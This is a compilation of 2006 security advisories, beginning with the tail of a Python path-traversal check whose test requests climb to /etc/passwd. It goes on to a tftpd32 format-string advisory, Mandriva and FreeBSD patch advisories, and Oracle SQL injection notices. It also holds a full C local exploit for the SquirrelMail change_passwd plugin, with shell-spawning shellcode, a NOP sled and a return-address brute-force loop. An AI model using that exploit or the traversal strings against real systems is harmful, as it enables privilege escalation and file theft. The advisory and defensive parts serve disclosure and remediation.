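        resolve_share(requested, root)
    except PathRejected:
        return False
    return True


# Constructed requests: a normal one, the traversal from the advisory with
# and without the NUL byte, and an encoded variant of the same climb.
REQUESTS = [
    "docs/readme.txt",
    "../../../../../../../../etc/passwd",
    "../../../../../../../../etc/passwd%00",
    "docs%2F..%2F..%2Fetc%2Fpasswd",
]

if __name__ == "__main__":
    for req in REQUESTS:
        try:
            print(req, "->", resolve_share(req))
        except PathRejected as exc:
            print(req, "-> rejected:", exc)
```

Checking containment on the normalized result, rather than searching the input for "..", is what makes the encoded and mixed forms fail the same way as the plain one.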
Critical security advisory #006 tftpd32 Format string
Critical security advisory #006
Tftpd32 2.81 Format String + DoS PoC

Critical Security - 22:03 2006.01.19
Critical Security research: http://www.critical.lt
Product site: http://tftpd32.jounin.net/
Credits: Critical Security Team (www.critical.lt)
Original Advisory: http://www.critical.lt/?vulnerabilities/200

Due to incorrect use of format strings there is a possibility of remote code execution. You can trigger this vulnerability by sending a SEND or GET request with a specially formatted string.

Vulnerable code:

LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX                                 ; /Arglist
PUSH EDX                                 ; |Format
PUSH EAX                                 ; |s = 00E6F4E8
CALL DWORD PTR DS:[USER32.wvsprintfA]    ; \wvsprintfA

Proof of concept exploit:
http://www.critical.lt/research/tftpd32_281_dos.txt
MDKSA-2006:017 - Updated mod_auth_ldap packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2006:017
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mod_auth_ldap
Date    : January 19, 2006
Affected: Corporate 2.1
_______________________________________________________________________

Problem Description:

A format string flaw was discovered in the way that auth_ldap logs information which may allow a remote attacker to execute arbitrary code as the apache user if auth_ldap is used for authentication.

This update provides version 1.6.1 of auth_ldap which corrects the problem. Only Corporate Server 2.1 shipped with a supported auth_ldap package.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150
_______________________________________________________________________

Updated Packages:

Corporate Server 2.1:
a579c887e48daaa8281ecdc4e1381fa0  corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.i586.rpm
3af337e3989aed18d9c6e634ecb3e47b  corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm

Corporate Server 2.1/X86_64:
b3c27d91b6fa68e557507318c8e18f0c  x86_64/corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.x86_64.rpm
3af337e3989aed18d9c6e634ecb3e47b  x86_64/corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDz9lvmqjQ0CJFipgRAhbvAKDejWx5RUTciABT7qVXho9XOyOH5ACgsi58
FLI7qZytVoR7yezzkdYV47M=
=GvY0
-----END PGP SIGNATURE-----
FreeBSD Security Advisory FreeBSD-SA-06:05.80211
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-06:05.80211                                      Security Advisory
                                                          The FreeBSD Project

Topic:          IEEE 802.11 buffer overflow

Category:       core
Module:         net80211
Announced:      2006-01-18
Credits:        Karl Janmar
Affects:        FreeBSD 6.0
Corrected:      2006-01-18 09:03:15 UTC (RELENG_6, 6.0-STABLE)
                2006-01-18 09:03:36 UTC (RELENG_6_0, 6.0-RELEASE-p3)
CVE Name:       CVE-2006-0226

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit http://www.freebsd.org/security/.

I.   Background

The IEEE 802.11 network subsystem of FreeBSD implements the protocol negotiation used for wireless networking.

II.  Problem Description

An integer overflow in the handling of corrupt IEEE 802.11 beacon or probe response frames when scanning for existing wireless networks can result in the frame overflowing a buffer.

III. Impact

An attacker able to broadcast a carefully crafted beacon or probe response frame may be able to execute arbitrary code within the context of the FreeBSD kernel on any system scanning for wireless networks.

IV.  Workaround

No workaround is available, but systems without IEEE 802.11 hardware or drivers loaded are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE or to the RELENG_6_0 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.0 systems.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the revision numbers of each file that was corrected in FreeBSD.

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_6
  src/sys/net80211/ieee80211_ioctl.c                              1.25.2.9
RELENG_6_0
  src/UPDATING                                               1.416.2.3.2.8
  src/sys/conf/newvers.sh                                     1.69.2.8.2.4
  src/sys/net80211/ieee80211_ioctl.c                          1.25.2.3.2.1
- -------------------------------------------------------------------------

VII. References

http://www.signedness.org/advisories/sps-0x1.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0226

The latest revision of this advisory is available at
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:05.80211.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDzgUEFdaIBMps37IRAnB4AJ9btdO5oRpjDyksIQKhimmnAvaqSgCfdqZJ
q5gy4Ec/4lhZjoaGCbUuncU=
=XgsT
-----END PGP SIGNATURE-----
Change passwd 3.1 (SquirrelMail plugin )
Change passwd 3.1 (SquirrelMail plugin)
Coded by rod hedor
web-- http://lezr.com

[local exploit]

* Multiple buffer overflows are present in the handling of command line arguments in chpasswd. The bug allows a hacker to exploit the process to run arbitrary code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memcpy */

const char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
    "\x89\xe5\x31\xc0\x50\x55\x89\xe5"
    "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x89\xe9\x89"
    "\xea\xb0\x0b\xcd\x80";

/* current stack pointer (x86) */
long get_sp() {
    __asm__("movl %esp,%eax;");
}

int main() {
    char buffer[1024];
    long stack = get_sp();
    int result = 1;
    long offset = 0;

    printf("[!] Change_passwd v3.1 (SquirrelMail plugin) exploit\n");
    printf("[+] Current stack [0x%x]\n", stack);

    while (offset <= 268435456) {
        offset = offset + 1;
        stack = get_sp() + offset;
        /* environment variable EGG=xxxx...<return address><shellcode> */
        memcpy(buffer, "EGG=", 4);
        int a = 4;
        while (a <= 108) {
            memcpy(&buffer[a], "x", 1);
            a = a + 1;
        }
        memcpy(&buffer[108], &stack, 4);
        memcpy(&buffer[112], shellcode, sizeof(shellcode));
        putenv(buffer);
        result = system("./chpasswd $EGG");
        if (result == 0) {
            exit(0);
        }
    }
}
Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT
# http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft.html ###

SQL Injection in package SYS.KUPV$FT

Name        SQL Injection in package SYS.KUPV$FT
Affected    Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    17 Jan 2006 (V 1.00)

Details:

The package SYS.KUPV$FT contains 3 SQL injection vulnerabilities in the functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle fixed these vulnerabilities with the package dbms_assert.

Patch Information:

## Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1.

History:

01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
17-jan-2006 Oracle published CPU January 2006
17-jan-2006 Advisory published

© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/published_alerts.html
Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT_INT
# http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft_int.html ###

Name        SQL Injection in package SYS.KUPV$FT_INT
Affected    Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    17 Jan 2006 (V 1.00)

Details:

The package SYS.KUPV$FT_INT contains 16 SQL injection vulnerabilities in the functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle is now using bind variables to fix these vulnerabilities.

Patch Information:

## Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1.

History:

01-nov-2005 Oracle secalert was informed about vulnerabilities in ACTIVE_JOB, ATTACH_JOB, ATTACH_POSSIBLE, CREATE_NEW_JOB, DELETE_JOB, UPDATE_JOB
02-nov-2005 Oracle secalert asked for an exploit
17-jan-2006 Oracle published CPU January 2006
17-jan-2006 Advisory published

© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/published_alerts.html